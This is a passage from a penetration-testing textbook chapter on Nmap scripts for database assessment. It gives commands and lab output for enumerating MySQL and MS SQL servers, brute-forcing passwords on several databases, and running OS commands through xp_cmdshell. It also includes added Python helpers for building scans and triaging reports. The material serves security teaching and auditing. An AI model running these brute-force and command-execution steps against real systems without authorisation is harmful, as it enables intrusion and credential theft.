Chapter 8 Database Penetration Testing

Topics in this chapter

This chapter covers the use of Nmap scripts (NSE) for database penetration testing. The Nmap Scripting Engine reaches into almost every phase of a test, and database services are no exception: there are scripts that enumerate databases and server settings, check for empty or weak passwords, audit configuration against a benchmark, and, given sufficient privilege, run operating-system commands through the database. After working through this chapter the reader should know what Nmap can and cannot do for a database security assessment.

Scripts used in this chapter

Table 8.1 lists the Nmap scripts used in this chapter; it is collected here so the reader can look them up in one place.

Table 8.1 Scripts used in this chapter (option names)

Script                  Description
----------------------  --------------------------------------------------
mysql-databases         Enumerate MySQL databases
mysql-variables         List MySQL server variables
mysql-empty-password    Check MySQL root/anonymous accounts for empty passwords
mysql-brute             Audit MySQL passwords (dictionary attack)
mysql-audit             Audit MySQL security configuration
oracle-brute            Audit Oracle passwords (dictionary attack)
ms-sql-brute            Audit MS SQL Server passwords (dictionary attack)
ms-sql-empty-password   Check MS SQL Server for an empty sa password
ms-sql-tables           Enumerate MS SQL Server tables and columns
ms-sql-xp-cmdshell      Run OS commands through MS SQL Server (xp_cmdshell)
pgsql-brute             Audit PostgreSQL passwords (dictionary attack)

Table 8.2 repeats the script list of Table 8.1 with the script for this section, mysql-databases (enumerate MySQL databases), in bold; the table is not reproduced again here.

Run "nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass target" to enumerate the databases on a MySQL server. mysqluser is the account to log in with; mysqlpass given without a value, as here, means an empty password.

root@Wing:~# nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:20 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql
| test
| cmcc
|_ information_schema 

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
root@Wing:~# 


Once we know a valid account for the target MySQL server, listing its databases is trivial; the script logs in and asks the server for the database list, so what comes back is whatever that account is allowed to see. If the service is not on its default port, add -p with the correct port. mysqluser selects the account, mysqlpass the password (leave the value out when the password is empty), and the target IP address comes last.

root@Wing:~# nmap -p3310 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:32 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT   STATE SERVICE
3310/tcp open dyna-access
| mysql
| test
| cmcc
|_ information_schema 

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~# 


The output shows four databases on the target: mysql, test, cmcc and information_schema. (With -p3310 and no version detection, Nmap labels the port from its nmap-services table, hence "dyna-access"; the label has no effect on the result.) We could also connect with a MySQL client and look for ourselves, but that needs a client installed and configured; the Nmap script gives the same answer from the scanning host directly. Nmap is not alone in this: Metasploit ships an equivalent module for listing databases.

 

Note: commands printed across several lines in this chapter are single commands. Type them on one line and do not press Enter at the printed line breaks.

Table 8.3 repeats the script list of Table 8.1 with the script for this section, mysql-variables (list MySQL variables), in bold; the table is not reproduced again here.

Run "nmap -p3306 --script=mysql-variables target" to list the MySQL server's variables.

root@Wing:~# nmap -p3306 --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:39 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@Wing:~# 


The mysql-variables script dumps every server variable (the output of SHOW VARIABLES), which reveals the install path (basedir), the build platform and version, character sets, timeouts and other settings useful for planning the next step. If the service is on a non-default port, specify it with -p.

root@Wing:~# nmap -p3310 --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:41 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3310/tcp open mysql
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~# 


If you are not sure which port MySQL is listening on, run with -sV instead of -p. NSE port scripts fire on a port number or on the service Nmap identified there, so on a non-standard port version detection is what gets the script to run reliably, and the version column confirms the service at the same time.

root@Wing:~# nmap -sV --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:42 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE      VERSION
80/tcp  open   http        Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6)
135/tcp  open   msrpc       Microsoft Windows RPC
139/tcp  open   netbios-ssn
443/tcp  open   ssl/http     Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6)
445/tcp  open   netbios-ssn
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open   vmware-auth    VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open   msrpc       Microsoft Windows RPC
1026/tcp open   msrpc       Microsoft Windows RPC
1027/tcp open   msrpc       Microsoft Windows RPC
1029/tcp open   msrpc       Microsoft Windows RPC
1037/tcp open   msrpc       Microsoft Windows RPC
1038/tcp open   msrpc       Microsoft Windows RPC
1169/tcp open   tripwire?
3306/tcp open   mysql       MySQL (unauthorized)
5678/tcp open   rrac?
7000/tcp open   afs3-fileserver?
8000/tcp open   tcpwrapped
10000/tcp open   snet-sensor-mgmt?
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 298.43 seconds
root@Wing:~# 


The price of -sV is time: this scan took almost five minutes against a fraction of a second with -p.

mysql-variables has to log in before it can read anything, so it needs credentials. Either pass them directly with --script-args mysqluser=...,mysqlpass=..., or run it together with mysql-brute or mysql-empty-password: those scripts are listed as its dependencies, and any login they find is reused by mysql-variables.

Table 8.4 repeats the script list of Table 8.1 with the script for this section, mysql-empty-password (check for empty MySQL passwords), in bold; the table is not reproduced again here.

Run "nmap -p3306 --script=mysql-empty-password target" to check whether the target MySQL service accepts logins without a password.

root@Wing:~# nmap -p3306 --script=mysql-empty-password 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:46 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
|  anonymous account has empty password
|_ root account has empty password

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
root@Wing:~# 


The script tries to log in as root and as the anonymous account with an empty password; it is a quick hygiene check rather than a dictionary attack. The result above means both accounts have no password at all, so anyone who can reach port 3306 from a host the grant table permits can log in as root.

If you cannot tell which port the service is on, scan with -sV.

root@Wing:~# nmap -sV --script=mysql-empty-password 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:53 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE       VERSION
80/tcp  open   http        Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6)
135/tcp  open   msrpc      Microsoft Windows RPC
139/tcp  open   netbios-ssn
443/tcp  open   ssl/http     Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6)
445/tcp  open   netbios-ssn
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open   vmware-auth    VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open   msrpc       Microsoft Windows RPC
1026/tcp open   msrpc       Microsoft Windows RPC
1027/tcp open   msrpc       Microsoft Windows RPC
1029/tcp open   msrpc       Microsoft Windows RPC
1037/tcp open   msrpc       Microsoft Windows RPC
1038/tcp open   msrpc       Microsoft Windows RPC
1169/tcp open   tripwire?
3306/tcp open   mysql       MySQL (unauthorized)
|_mysql-empty-password: Host 'pgos' is not allowed to connect to this MySQL server
5678/tcp open   rrac?
7000/tcp open   afs3-fileserver?
8000/tcp open   tcpwrapped
10000/tcp open   snet-sensor-mgmt?
| mysql-empty-password:
|  anonymous account has empty password
|_ root account has empty password

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 296.45 seconds
root@Wing:~# 


If you already know the port, use -p and save the time. Note the line "Host 'pgos' is not allowed to connect to this MySQL server" on port 3306: that is the server rejecting the scanning host by its grant table (MySQL accounts are user@host pairs), not a wrong password. An account can still have an empty password and be reachable from a host the grants allow.

 

In practice we first map the open ports quickly with options such as -F or -T4 and only then run version detection and scripts against the ports found, rather than starting with -sV. Going straight to -sV skips that information-gathering step and, as the timings above show, costs minutes instead of seconds.

Table 8.5 repeats the script list of Table 8.1 with the script for this section, mysql-brute (audit MySQL passwords), in bold; the table is not reproduced again here.

Run "nmap --script=mysql-brute target" to audit the target MySQL password with a dictionary attack.

root@Wing:~# nmap --script=mysql-brute 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 20:59 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE
80/tcp  open   http
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
443/tcp  open   https
445/tcp  open   microsoft-ds
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   iss-realsecure
912/tcp  open   apex-mesh
1025/tcp open   NFS-or-IIS
1026/tcp open   LSA-or-nterm
1027/tcp open   IIS
1029/tcp open   ms-lsa
1037/tcp open   ams
1038/tcp open   mtqp
1169/tcp open   tripwire
3306/tcp open   mysql
| mysql-brute:
|  Accounts
|   root:root - Valid credentials

5678/tcp open   rrac
7000/tcp open   afs3-fileserver
8000/tcp open   http-alt
10000/tcp open   snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 271.00 seconds
root@Wing:~# 


The mysql-brute script tests a MySQL service for weak credentials. Without -p, Nmap scans its default top 1000 TCP ports (the transcript above says "Not shown: 979 closed ports") and runs the script on whatever it recognises as MySQL; -p restricts the scan to one port. Custom user and password lists are passed with the userdb and passdb script arguments. The following attempt gets this wrong and is worth reading closely:

root@linux:/usr/share/nmap/scripts# nmap -p 3306 --script=mysql-brute userdb=/root/ passdb.txt passdb=/root/pass.txt 192.168.0.110

Starting Nmap 6.25 ( http://nmap.org ) at 2014-06-12 21:50 CST
Illegal netmask value, must be /0 - /32 . Assuming /32 (one host)
Failed to resolve given hostname/IP: userdb=. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges. If the machine only has an IPv6 address, add the Nmap -6 flag to scan that.

…omitted…

3306/tcp open mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 163.77 seconds

Because --script-args is missing, Nmap treats userdb=/root/, passdb.txt and passdb=/root/pass.txt as extra targets (hence the netmask and hostname errors), drops them, and scans 192.168.0.110 with the script's built-in wordlists, which is how root:root was found. The intended command keeps the script arguments together, comma-separated and with no spaces, behind --script-args:

nmap -p 3306 --script=mysql-brute --script-args userdb=/root/userdb.txt,passdb=/root/pass.txt 192.168.0.110

(substitute the paths of your own wordlists).
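The same mistakes recur with every brute script in this chapter (mysql-brute here, and oracle-brute, ms-sql-brute and pgsql-brute below), so the following added example, which is not code from the book or from the Nmap project, builds the command line programmatically: it quotes values that Nmap's --script-args grammar would otherwise split (commas, '=', braces, whitespace), keeps every argument in one --script-args option, and returns an argv list that can be printed or executed. The target, ports and wordlist paths are placeholders.

```python
"""Build a correct Nmap command line for the NSE database scripts.

Added example; it is not code from the book or from the Nmap project.
It exists because the chapter's own transcript shows what goes wrong
when userdb=... is typed without --script-args (Nmap treats the token
as a target and reports "Failed to resolve given hostname/IP: userdb=")
and because passwords with commas, '=' or spaces must be quoted under
Nmap's --script-args grammar. Target, ports and wordlist paths used in
the demo are placeholders.
"""
import shlex
import subprocess
from typing import Dict, List, Optional

# Per the nmap man page, an unquoted --script-args value may not contain
# whitespace or any of { } = , ; a quote character starts a quoted string,
# so a value containing one must be quoted as well.
_SPECIAL = set("{}=, \t\n\"'")


def nse_value(value: str) -> str:
    """Render one script-argument value, quoting it only when required.

    Inside a quoted string only the quote character is escaped with a
    backslash; every other backslash is taken literally by Nmap.
    """
    if value and not any(ch in _SPECIAL for ch in value):
        return value
    return '"' + value.replace('"', '\\"') + '"'


def script_args(args: Dict[str, str]) -> str:
    """Join name=value pairs into one comma-separated --script-args string."""
    for name in args:
        if not name or any(ch in _SPECIAL for ch in name):
            raise ValueError(f"invalid script-args name: {name!r}")
    return ",".join(f"{name}={nse_value(value)}" for name, value in args.items())


def build_nmap_argv(target: str, ports: List[int], scripts: List[str],
                    args: Optional[Dict[str, str]] = None,
                    xml_out: Optional[str] = None) -> List[str]:
    """Return argv for nmap with exactly one -p, --script and --script-args.

    All script arguments go into a single --script-args option; keeping
    them together, rather than repeating the option as one of the
    oracle-brute commands in this chapter does, avoids depending on how
    Nmap treats a repeated option.
    """
    argv = ["nmap", "-p", ",".join(str(p) for p in ports),
            "--script", ",".join(scripts)]
    if args:
        argv += ["--script-args", script_args(args)]
    if xml_out:
        argv += ["-oX", xml_out]   # machine-readable report for later triage
    argv.append(target)
    return argv


def run_nmap(argv: List[str]) -> str:
    """Execute the built command; needs nmap on PATH and authorisation to scan."""
    done = subprocess.run(argv, check=True, capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    # Placeholder target and wordlist paths for the demonstration.
    argv = build_nmap_argv(
        "192.168.0.110", [3306], ["mysql-brute"],
        {"userdb": "/root/users.txt", "passdb": "/root/pass.txt"},
        xml_out="mysql-brute.xml")
    print(shlex.join(argv))   # paste into a shell, or call run_nmap(argv)
```

A password such as p,ss=w0rd comes out as "p,ss=w0rd" inside the single --script-args string, which is what the manual prescribes; the shell-level quoting is then handled by passing argv to subprocess without a shell, or by shlex.join when printing.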

Table 8.6 repeats the script list of Table 8.1 with the script for this section, mysql-audit (audit MySQL security configuration), in bold; the table is not reproduced again here.

Run "nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" target" to audit the MySQL security configuration.

root@Wing:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:13 CST
Nmap scan report for 192.168.84.1
Host is up (0.0025s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-audit:
|  CIS MySQL Benchmarks v1.0.2
|    3.1: Skip symbolic links => PASS
|    3.2: Logs not on system partition => PASS
|    3.2: Logs not on database partition => PASS
|    4.1: Supported version of MySQL => REVIEW
|     Version: 5.1.54-1ubuntu4
|    4.4: Remove test database => PASS
|    4.5: Change admin account name => FAIL
|    4.7: Verify Secure Password Hashes => PASS
|    4.9: Wildcards in user hostname => FAIL
|     The following users were found with wildcards in hostname
|      root
|      super
|      super2
|    4.10: No blank passwords => PASS
|    4.11: Anonymous account => PASS
|    5.1: Access to mysql database => REVIEW
|     Verify the following users that have access to the MySQL database
|      user       host
|      root       localhost
|      root       patrik-11
|      root       127.0.0.1
|      debian-sys-maint localhost
|      root       %
|      super       %
|    5.2: Do not grant FILE privileges to non Admin users => REVIEW
|     The following users were found having the FILE privilege
|      super
|      super2
|    5.3: Do not grant PROCESS privileges to non Admin users => REVIEW
|     The following users were found having the PROCESS privilege
|      super
|    5.4: Do not grant SUPER privileges to non Admin users => REVIEW
|     The following users were found having the SUPER privilege
|      super
|    5.5: Do not grant SHUTDOWN privileges to non Admin users => REVIEW
|     The following users were found having the SHUTDOWN privilege
|      super
|    5.6: Do not grant CREATE USER privileges to non Admin users => REVIEW
|     The following users were found having the CREATE USER privilege
|      super
|    5.7: Do not grant RELOAD privileges to non Admin users => REVIEW
|     The following users were found having the RELOAD privilege
|      super
|    5.8: Do not grant GRANT privileges to non Admin users => PASS
|    6.2: Disable Load data local => FAIL
|    6.3: Disable old password hashing => PASS
|    6.4: Safe show database => FAIL
|    6.5: Secure auth => FAIL
|    6.6: Grant tables => FAIL
|    6.7: Skip merge => FAIL
|    6.8: Skip networking => FAIL
|    6.9: Safe user create => FAIL
|    6.10: Skip symbolic links => FAIL
|
|_   The audit was performed using the db-account: root

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
root@Wing:~# 


The mysql-audit script compares a MySQL server's settings and grant tables against the checks in an audit file, here the CIS benchmark that ships with Nmap as nselib/data/mysql-cis.audit (the path is resolved relative to Nmap's data directory). -p selects the port; use -sV if the port is unknown. mysql-audit.username and mysql-audit.password give the account used for the audit, with the password left as '' when it is empty; the account needs enough privilege to read the mysql.user table, because the account-related checks (4.5, 4.9, 5.1 to 5.8) are built on it. PASS and FAIL are decided by the script; REVIEW items list what was found and need a human decision, for example whether the users holding FILE, PROCESS or SUPER are really administrators.

Table 8.7 repeats the script list of Table 8.1 with the script for this section, oracle-brute (audit Oracle passwords), in bold; the table is not reproduced again here.

Run "nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test target" to audit Oracle passwords. The listener needs to know which instance to connect to, so the SID (here test) is mandatory and is passed as oracle-brute.sid; if it is unknown, Nmap's oracle-sid-brute script can guess it first.

root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT   STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
|  Accounts
|   system:powell => Account locked
|   haxxor:haxxor => Valid credentials
|  Statistics
|_  Perfomed 157 guesses in 8 seconds, average tps: 19

Nmap done: 1 IP address (1 host up) scanned in 263.39 seconds
root@Wing:~# 


The oracle-brute script runs a dictionary attack against Oracle logins; -p selects the listener port. To use your own wordlists, pass the user list with userdb and the password list with passdb, in the same --script-args as the SID. Two things in the output deserve attention: "system:powell => Account locked" means the privileged system account is already locked, and Oracle profiles lock an account after a number of failed logins (the FAILED_LOGIN_ATTEMPTS limit), so a dictionary attack can lock out legitimate users; agree on this risk before running it against a production system.

root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test,userdb=/tmp/usernames.txt,passdb=/tmp/passwords.txt 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT   STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
|  Accounts
|   system:powell => Account locked
|   haxxor:haxxor => Valid credentials
|  Statistics
|_  Perfomed 157 guesses in 8 seconds, average tps: 19

Nmap done: 1 IP address (1 host up) scanned in 393.56 seconds
root@Wing:~# 


Table 8.8 repeats the script list of Table 8.1 with the script for this section, ms-sql-brute (audit MS SQL Server passwords), in bold; the table is not reproduced again here.

Run "nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt,passdb=pass.txt target" to audit MS SQL Server passwords with your own user and password lists (the two arguments are separated by a comma with no space).

root@Wing:~# nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt,passdb=pass.txt 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:44 PDT
Nmap scan report for 192.168.84.1
Host is up (0.00021s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-brute: 
|_ sa:123456 => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

root@Wing:~#


Table 8.9 repeats the script list of Table 8.1 with the script for this section, ms-sql-empty-password (check for an empty MS SQL Server sa password), in bold; the table is not reproduced again here.

Run "nmap -p 1433 --script ms-sql-empty-password target" to check MS SQL Server for an empty sa password.

root@Wing:~# nmap -p 1433 --script ms-sql-empty-password 192.168.126.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 22:03 CST
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
|  [192.168.126.1\PROD]
|_  sa:<empty> => Login Success

Nmap done: 1 IP address (1 host up) scanned in 231.16 seconds
root@Wing:~# 


The ms-sql-empty-password script tries to log in to each SQL Server instance as the built-in sysadmin account sa with an empty password. The output names the instance in brackets (192.168.126.1\PROD) and reports sa:<empty> => Login Success: the most privileged account on that instance has no password at all, which is the precondition for everything in the next two sections.

Table 8.10 repeats the script list of Table 8.1 with the script for this section, ms-sql-tables (enumerate MS SQL Server tables), in bold; the table is not reproduced again here.

Run "nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa target" to enumerate the tables on an MS SQL Server.

root@Wing:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:51 PDT
Nmap scan report for 192.168.126.131
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables: 
|  pen
|   table column   type length
|   ===== ======   ==== ======
|   products id   int  4
|   products prodName   varchar 50
|   users userId   int  4
|   users  sername varchar    50
|   users userPass  varchar    20
|  
|  Restrictions
|   Output restricted to 2 tables (see mssql-tables.maxtables)
|   Output restricted to 5 databases (see mssql-tables.maxdb)
|_  No filter (see mssql-tables.keywords)

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@Wing:~# 


The ms-sql-tables script enumerates the databases, tables and columns the account can see (schema, not row contents): here database pen with tables products and users, and a users table with a userPass column is an obvious next target. -p selects the port; mssql.username and mssql.password supply the credentials and are shared by all ms-sql-* scripts. The Restrictions block at the end shows the output limits and the arguments that raise them: mssql-tables.maxdb, mssql-tables.maxtables and mssql-tables.keywords (note the mssql- prefix, which differs from the script's own name).

Table 8.11 repeats the script list of Table 8.1 with the script for this section, ms-sql-xp-cmdshell (run OS commands through MS SQL Server), in bold; the table is not reproduced again here.

Run "nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" target" to execute an operating-system command through MS SQL Server.

root@Wing:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.126.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-12 21:55 PDT
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
|  ipconfig /all
|  output
|  ======
|  
|  Windows IP Configuration
|  
|   Host Name . . . . . . . . . . . . : wing
|   Primary Dns Suffix . . . . . . . : 
|   Node Type . . . . . . . . . . . . : Hybrid
|   IP Routing Enabled. . . . . . . . : No
|   WINS Proxy Enabled. . . . . . . . : No
|   DNS Suffix Search List. . . . . . : localdomain
|  
|  Ethernet adapter ,0\xDE\xA5:
|  
|   Connection-specific DNS Suffix . : localdomain
|   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
|   Physical Address. . . . . . . . . : 00-0D-29-06-18-F3
|   DHCP Enabled. . . . . . . . . . . : Yes
|   Autoconfiguration Enabled . . . . : Yes
|   IP Address. . . . . . . . . . . . : 192.168.126.1
|   Subnet Mask . . . . . . . . . . . : 255.255.255.0
|   Default Gateway . . . . . . . . . : 192.168.126.1
|   DHCP Server . . . . . . . . . . . : 192.168.126.2
|   DNS Servers . . . . . . . . . . . : 192.168.126.1
|   Primary WINS Server . . . . . . . : 192.168.126.1
|_ 

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
root@Wing:~# 


The ms-sql-xp-cmdshell script runs an operating-system command through the xp_cmdshell extended stored procedure, and with enough privilege that includes adding or deleting administrator accounts on the host. Three conditions must hold: the SQL Server port is reachable, you know a working login, and that login holds the sysadmin server role, because xp_cmdshell is disabled by default on SQL Server 2005 and later and only sysadmin can enable and call it. Note that the transcript shows the script's default command, ipconfig /all, rather than the ipconfig given on the command line: the argument name was not recognised by this Nmap version, so use the name the script prints in its own hint ("Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command."), which carries the same mssql- prefix as the ms-sql-tables arguments in the previous section. The garbled adapter name in the output (",0\xDE\xA5") is the non-ASCII Windows adapter name mangled in transit, not a sign of failure.

Table 8.12 repeats the script list of Table 8.1 with the script for this section, pgsql-brute (audit PostgreSQL passwords), in bold; the table is not reproduced again here.

Run "nmap -p 5432 --script pgsql-brute target" to audit PostgreSQL passwords.

root@Wing:~# nmap -p 5432 --script pgsql-brute 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 13:58 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT  STATE SERVICE
5432/tcp open pgsql
| pgsql-brute:
|  root:<empty> => Valid credentials
|_ test:test => Valid credentials
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
root@Wing:~# 


The pgsql-brute script is a fast dictionary attack against PostgreSQL (port 5432 by default) for weak or empty credentials; userdb and passdb take custom wordlists exactly as with the other brute scripts. Here root with an empty password and test:test are both accepted. An empty password being accepted usually means either the role has no password set or the server's pg_hba.conf grants trust authentication to the scanning host's address; that configuration weakness is worth reporting separately from the weak password itself. The MAC Address line shows the target is on the same network segment (a VMware guest).
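Across this chapter the interesting results all arrive as script output lines: "has empty password" from the empty-password checks, "Valid credentials" or "Login Success" from mysql-brute, oracle-brute, ms-sql-brute and pgsql-brute, "Account locked" from oracle-brute, "=> FAIL" and "=> REVIEW" from mysql-audit, and any output at all from ms-sql-xp-cmdshell. The following added example, which is not code from the book or the Nmap project, turns an Nmap XML report (the -oX output) of such a scan into a list of graded findings. It reads the output attribute of each <script> element, the same text Nmap prints on the terminal, so it does not depend on each script's structured table layout. SAMPLE_XML is constructed for the example and modelled on the chapter's transcripts; in real use the report comes from adding -oX report.xml to the scan command.

```python
"""Triage the database NSE findings in an Nmap XML report (-oX).

Added example; not code from the book or the Nmap project. It reads the
output attribute of each <script> element, which holds the same text
Nmap prints on the terminal, so one set of rules covers every script in
this chapter (empty-password checks, the *-brute scripts, mysql-audit
and ms-sql-xp-cmdshell). SAMPLE_XML is constructed for the example and
modelled on the chapter's transcripts.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample report; Nmap encodes newlines in output attributes as &#xa;.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="6.40">
<host><status state="up"/><address addr="192.168.84.1" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/>
<script id="mysql-empty-password" output="&#xa;  anonymous account has empty password&#xa;  root account has empty password"/>
<script id="mysql-brute" output="&#xa;  Accounts&#xa;    root:root - Valid credentials"/>
<script id="mysql-audit" output="&#xa;  CIS MySQL Benchmarks v1.0.2&#xa;    4.5: Change admin account name =&gt; FAIL&#xa;    4.10: No blank passwords =&gt; PASS&#xa;    5.2: Do not grant FILE privileges to non Admin users =&gt; REVIEW&#xa;    6.8: Skip networking =&gt; FAIL"/>
</port>
<port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
<script id="ms-sql-empty-password" output="&#xa;  [192.168.84.1\\PROD]&#xa;    sa:&lt;empty&gt; =&gt; Login Success"/>
<script id="ms-sql-xp-cmdshell" output="&#xa;  ipconfig /all&#xa;  output&#xa;  ======&#xa;  Windows IP Configuration"/>
</port></ports></host>
<host><status state="up"/><address addr="192.168.126.131" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="1521"><state state="open"/><service name="oracle"/>
<script id="oracle-brute" output="&#xa;  Accounts&#xa;    system:powell =&gt; Account locked&#xa;    haxxor:haxxor =&gt; Valid credentials"/>
</port>
<port protocol="tcp" portid="5432"><state state="open"/><service name="postgresql"/>
<script id="pgsql-brute" output="&#xa;  root:&lt;empty&gt; =&gt; Valid credentials&#xa;  test:test =&gt; Valid credentials"/>
</port></ports></host>
</nmaprun>
"""

SEVERITY_ORDER = ["critical", "high", "warning", "info"]


@dataclass
class Finding:
    host: str
    port: int
    script: str
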